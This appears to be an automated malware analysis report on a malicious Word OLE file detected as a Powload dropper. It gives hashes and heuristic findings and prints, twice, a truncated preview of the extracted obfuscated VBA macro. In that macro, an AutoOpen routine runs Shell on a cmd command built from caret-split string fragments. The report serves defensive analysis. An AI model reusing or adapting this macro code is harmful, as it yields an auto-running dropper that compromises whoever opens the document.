Office (OLE) malware analysis — malicious · e6349ffaa8b50d88

MALICIOUS

Office (OLE)

81.8 KB Created: 2018-08-31 09:54:00 Authoring application: Microsoft Office Word First seen: 2018-09-04

MD5: 6faf33dcd2aebb8a38e44ee3138db09e SHA-1: 1fca477369ffd062b71df6f1d5dafb2a106c820e SHA-256: e6349ffaa8b50d88fbad3ad09d8363533b30af9eec2fcfef81577daa9be850db

202 Risk Score

Heuristics 6

ClamAV: Doc.Dropper.Powload-6667984-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Powload-6667984-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10335 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10335 bytes
SHA-256: `792a12329b597ab7070a019a90c7b10ff90460a49f16dd3f35041594ffbb544c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ZQcjfdlPiQGGEW" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On _ Error _ Resume _ Next Hour jlOSlR * 48919 / 11027 * bYDHw Hour DjWpHZ / 24781 * cndCjN / YsbTPq Hour wVZFDz / GrTvN * izBrjO * NMDAzr Shell KeyString(2 + 12 + 1 + 1 + 51) + VJZDDMP + iIYYJrHnnD + oJFiilVFEm + dGWaSUBwzOM + PavwLwjUbZ + hQYtzBW + ohMdzn + bYCiRbLK + lVOthXsjZzS, 11 - 11 Hour RjnRhv / JCMwu Hour VllEo / BWDKQJ / uGiuoK * lBdJdO End Sub Attribute VB_Name = "jJPwzAXun" Function oJFiilVFEm() On _ Error _ Resume _ Next Hour 89224 / uaVui / zYvoLR / PZYFf Hour wFJFWi / Gzptpi / 43047 / iqKZv Hour cwYRK / 87399 / KawTG / 4025 Hour iAnTi / RzBWEB NipnISwL = "md /V" + "^:^ON" + "/C" + Chr(4 + 4 + 0 + 2 + 24) + "^se" + "^" + "t ^2" + "^zt=A" + "^AC" + "A^g^A" + "A^" Hour fDCJnS / wEiVJT Hour TPDtuw * EjlJp Hour 92994 / 39376 / 10409 * 30589 Hour uYRME / KAWuG * 85111 / 99099 UsIhVW = "IA" + "^ACAg" + "A^A^IAA" + "C^A" + "^gA" + "A" Hour oXSWN * Dzrjv * 59628 * ctJwI Hour CGphS / Mdjrqz Hour 56161 * UjXbc / DRDXzm / pLNLkQ zwJzL = "IA^AC" + "Ag" + "A^A" + "I^A" + "AC^A^g^" + "A" + "^A" Hour 3868 * LWbhMj / YpqBU * zsqTj Hour owzzvr / 77214 * iAhntH * VUtXL Hour lrVNj * RaliG Hour lEkpaP * svpjKY Hour 48756 * oRzpmJ / ploYi * PYOkmv Hour mZnSKb / GRQio * 57878 * zPsvbj LMDGwRpNTX = "I^" + "AA" + "CA^gAQf" + "^A0H^A" + "^7^B" + "^A^a" + "A^M" + "G^A" Hour 3722 * 59512 Hour rSivO * uTDPZ Hour 73741 * vdtpI / aRvWW * 49352 dzYVJtNYiQ = "^0BQ^Y" + "^A^M^GA" + "9B^w^O^" + "AsG^Ah" + "^B" + "Q^ZAI^H" + "Ai^B^wO" + "A" Hour auSmjA * IjlKt * EowrH / QHTMW Hour ZXLYpL * VcVGq * UaUKE * 95103 Hour NGaiS / 18068 dRYpclzEz = "cHAM" + "^" + "B^QV" + "^AQ" + "CAg^" + "AQbAU^G" + "^" + "A^0B^Q^" + "SA^0" + "CA" + "^lB^" + "w^aA8^G" oJFiilVFEm = NipnISwL + UsIhVW + zwJzL + LMDGwRpNTX + dzYVJtNYiQ + dRYpclzEz Hour hvpwb * zKwziD Hour pBEiq / JIZckL * 32316 * uWBrfU Hour BEtcX * Hzlzln / 70598 * NbdDwZ End Function Function dGWaSUBwzOM() On _ Error _ Resume _ Next Hour PjLQZ * rYGfiA * oOPJAb / madBRI Hour bWNoo / ivMjiz Hour 47835 / IGcOmP / pZuVbo / 7308 BdFUcvNXT = "^A^2" + "^B^gbA" + "k" + "^E^" + "A7AQK^A" + "c^H^" + "A^M" + "B^QV^" + "A" + "^QCAg" + "^" + "AAL^AI^" + "GA^" Hour XdzkR * LIKSDZ Hour 53573 / NvVuou / 76830 / mhotTP Hour cRbuq / QFcwl Hour 83699 * 3719 ivjamdCuPn = "yBgYA^" + "QC^A" + "oAQ^Z" + "A" + "w^GA^" + "p" + "^B" + "^gRAQG" + "A" + "hB^w^b" + "A^" Hour 36760 / NtiPJ Hour iLDcvs / 87617 Hour 52261 / oAzim hSqUS = "w^G^" + "AuB^w" + "dA^8G" + "AE" + "B" + "^" + "g^L" + "^A^" Hour YpLCAR * auBvIm / 53644 * snQrNW Hour GVkbF * tbtDm / 71982 / XbKluU Hour ZSPMFH * 83435 LaHukWBQiD = "Y^FA^xB" + "^wS" + "AQC^A^7" + "B" + "^Q^eA^I" + "H^A^0" Hour 33740 / zdFhQ * 79461 * HBZCFz Hour 28680 * LFFSB Hour XNQVq * fQDzFX Hour 37737 / CVPALC * kmjmD / utwSN XCSoasurO = "^BweAk" + "CAmB^w" + "b^A^" + "E^E" + "^Ak^A^A" + "I^A4G^A" + "p" + "^BA^" + "I" + "^A^IG" + "A^y^" Hour 58314 / ZbvwUR Hour ELBRM * zofBJ / 80477 * uJZXp Hour 33977 / 95407 / FuwRik / DuzRr Hour 75121 / OtuPzX PvcWDA = "B^g" + "Y^AQCA" + "^o^AAa" + "A" + "M^G" + "Ah" + "^BQ" Hour qfSWbf / fspSHB Hour IWiDEv * cfoJl / 75503 * 76072 TVYfC = "Z^AIHAv" + "^B^gZA" + "sDAnA^" + "Q^" + "ZAgHAl" + "^B" + "^g^L" + "A" + "cC" + "^ArAgU" Hour hbGrYv * SVOEc / dLoHq * JFJsiC Hour 66262 / tzsjR / 66232 * aIujb hkfzYKQXf = "A^YEAWB" + "A" + "^J^A^sC" + "^An" + "AAX^Ac" + "C^Ar" dGWaSUBwzOM = BdFUcvNXT + ivjamdCuPn + hSqUS + LaHukWBQiD + XCSoasurO + PvcWDA + TVYfC + hkfzYKQXf Hour hDATKz / 93725 Hour 93755 / NfXiX / mMEYXW / KdDlj End Function Function PavwLwjUbZ() On _ Error _ Resume _ Next Hour 37551 / UaLfCT Hour zRvUE / 6 ... (truncated)

SHA-256: 792a12329b597ab7070a019a90c7b10ff90460a49f16dd3f35041594ffbb544c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ZQcjfdlPiQGGEW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()

On _
Error _
Resume _
Next
   Hour jlOSlR * 48919 / 11027 * bYDHw
   Hour DjWpHZ / 24781 * cndCjN / YsbTPq
   Hour wVZFDz / GrTvN * izBrjO * NMDAzr
Shell KeyString(2 + 12 + 1 + 1 + 51) + VJZDDMP + iIYYJrHnnD + oJFiilVFEm + dGWaSUBwzOM + PavwLwjUbZ + hQYtzBW + ohMdzn + bYCiRbLK + lVOthXsjZzS, 11 - 11
   Hour RjnRhv / JCMwu
   Hour VllEo / BWDKQJ / uGiuoK * lBdJdO
End Sub



Attribute VB_Name = "jJPwzAXun"
Function oJFiilVFEm()

On _
Error _
Resume _
Next
Hour 89224 / uaVui / zYvoLR / PZYFf
   Hour wFJFWi / Gzptpi / 43047 / iqKZv
   Hour cwYRK / 87399 / KawTG / 4025
   Hour iAnTi / RzBWEB
NipnISwL = "md /V" + "^:^ON" + "/C" + Chr(4 + 4 + 0 + 2 + 24) + "^se" + "^" + "t ^2" + "^zt=A" + "^AC" + "A^g^A" + "A^"
Hour fDCJnS / wEiVJT
   Hour TPDtuw * EjlJp
   Hour 92994 / 39376 / 10409 * 30589
   Hour uYRME / KAWuG * 85111 / 99099
UsIhVW = "IA" + "^ACAg" + "A^A^IAA" + "C^A" + "^gA" + "A"
Hour oXSWN * Dzrjv * 59628 * ctJwI
   Hour CGphS / Mdjrqz
   Hour 56161 * UjXbc / DRDXzm / pLNLkQ
zwJzL = "IA^AC" + "Ag" + "A^A" + "I^A" + "AC^A^g^" + "A" + "^A"
Hour 3868 * LWbhMj / YpqBU * zsqTj
   Hour owzzvr / 77214 * iAhntH * VUtXL
   Hour lrVNj * RaliG
   Hour lEkpaP * svpjKY
   Hour 48756 * oRzpmJ / ploYi * PYOkmv
   Hour mZnSKb / GRQio * 57878 * zPsvbj
LMDGwRpNTX = "I^" + "AA" + "CA^gAQf" + "^A0H^A" + "^7^B" + "^A^a" + "A^M" + "G^A"
Hour 3722 * 59512
   Hour rSivO * uTDPZ
   Hour 73741 * vdtpI / aRvWW * 49352
dzYVJtNYiQ = "^0BQ^Y" + "^A^M^GA" + "9B^w^O^" + "AsG^Ah" + "^B" + "Q^ZAI^H" + "Ai^B^wO" + "A"
Hour auSmjA * IjlKt * EowrH / QHTMW
   Hour ZXLYpL * VcVGq * UaUKE * 95103
   Hour NGaiS / 18068
dRYpclzEz = "cHAM" + "^" + "B^QV" + "^AQ" + "CAg^" + "AQbAU^G" + "^" + "A^0B^Q^" + "SA^0" + "CA" + "^lB^" + "w^aA8^G"
oJFiilVFEm = NipnISwL + UsIhVW + zwJzL + LMDGwRpNTX + dzYVJtNYiQ + dRYpclzEz
   Hour hvpwb * zKwziD
   Hour pBEiq / JIZckL * 32316 * uWBrfU
   Hour BEtcX * Hzlzln / 70598 * NbdDwZ
End Function
Function dGWaSUBwzOM()

On _
Error _
Resume _
Next
Hour PjLQZ * rYGfiA * oOPJAb / madBRI
   Hour bWNoo / ivMjiz
   Hour 47835 / IGcOmP / pZuVbo / 7308
BdFUcvNXT = "^A^2" + "^B^gbA" + "k" + "^E^" + "A7AQK^A" + "c^H^" + "A^M" + "B^QV^" + "A" + "^QCAg" + "^" + "AAL^AI^" + "GA^"
Hour XdzkR * LIKSDZ
   Hour 53573 / NvVuou / 76830 / mhotTP
   Hour cRbuq / QFcwl
   Hour 83699 * 3719
ivjamdCuPn = "yBgYA^" + "QC^A" + "oAQ^Z" + "A" + "w^GA^" + "p" + "^B" + "^gRAQG" + "A" + "hB^w^b" + "A^"
Hour 36760 / NtiPJ
   Hour iLDcvs / 87617
   Hour 52261 / oAzim
hSqUS = "w^G^" + "AuB^w" + "dA^8G" + "AE" + "B" + "^" + "g^L" + "^A^"
Hour YpLCAR * auBvIm / 53644 * snQrNW
   Hour GVkbF * tbtDm / 71982 / XbKluU
   Hour ZSPMFH * 83435
LaHukWBQiD = "Y^FA^xB" + "^wS" + "AQC^A^7" + "B" + "^Q^eA^I" + "H^A^0"
Hour 33740 / zdFhQ * 79461 * HBZCFz
   Hour 28680 * LFFSB
   Hour XNQVq * fQDzFX
   Hour 37737 / CVPALC * kmjmD / utwSN
XCSoasurO = "^BweAk" + "CAmB^w" + "b^A^" + "E^E" + "^Ak^A^A" + "I^A4G^A" + "p" + "^BA^" + "I" + "^A^IG" + "A^y^"
Hour 58314 / ZbvwUR
   Hour ELBRM * zofBJ / 80477 * uJZXp
   Hour 33977 / 95407 / FuwRik / DuzRr
   Hour 75121 / OtuPzX
PvcWDA = "B^g" + "Y^AQCA" + "^o^AAa" + "A" + "M^G" + "Ah" + "^BQ"
Hour qfSWbf / fspSHB
   Hour IWiDEv * cfoJl / 75503 * 76072
TVYfC = "Z^AIHAv" + "^B^gZA" + "sDAnA^" + "Q^" + "ZAgHAl" + "^B" + "^g^L" + "A" + "cC" + "^ArAgU"
Hour hbGrYv * SVOEc / dLoHq * JFJsiC
   Hour 66262 / tzsjR / 66232 * aIujb
hkfzYKQXf = "A^YEAWB" + "A" + "^J^A^sC" + "^An" + "AAX^Ac" + "C^Ar"
dGWaSUBwzOM = BdFUcvNXT + ivjamdCuPn + hSqUS + LaHukWBQiD + XCSoasurO + PvcWDA + TVYfC + hkfzYKQXf
   Hour hDATKz / 93725
   Hour 93755 / NfXiX / mMEYXW / KdDlj
End Function
Function PavwLwjUbZ()

On _
Error _
Resume _
Next
Hour 37551 / UaLfCT
   Hour zRvUE / 6
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.